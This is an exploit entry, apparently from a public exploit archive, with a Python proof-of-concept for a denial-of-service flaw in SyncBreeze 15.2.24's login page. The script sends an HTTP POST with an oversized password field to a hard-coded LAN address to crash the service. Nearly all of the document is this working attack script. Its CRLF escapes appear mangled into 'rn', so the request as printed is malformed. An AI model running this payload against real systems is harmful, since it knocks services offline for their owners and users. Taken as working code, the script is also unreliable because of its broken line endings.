SyncBreeze version 15.2.24 suffers from a denial of service vulnerability.
# Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service
# Date: 30/08/2023
# Exploit Author: mohamed youssef
# Vendor Homepage: https://www.syncbreeze.com/
# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe
# Version: 15.2.24
# Tested on: windows 10 64-bit
import socket
import time
pyload="username=admin&password="+'password='*500+""
request=""
request+="POST /login HTTP/1.1rn"
request+="Host: 192.168.217.135rn"
request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0rn"
request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8rn"
request+="Accept-Language: en-US,en;q=0.5rn"
request+="Accept-Encoding: gzip, deflatern"
request+="Content-Type: application/x-www-form-urlencodedrn"
request+="Content-Length: "+str(len(pyload))+"rn"
request+="Origin: http://192.168.217.135rn"
request+="Connection: keep-alivern"
request+="Referer: http://192.168.217.135/loginrn"
request+="Upgrade-Insecure-Requests: 1rn"
request+="rn"
request+=pyload
print (request)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.217.135",80))
s.send(request.encode())
print (s.recv(1024))
s.close()
time.sleep(5)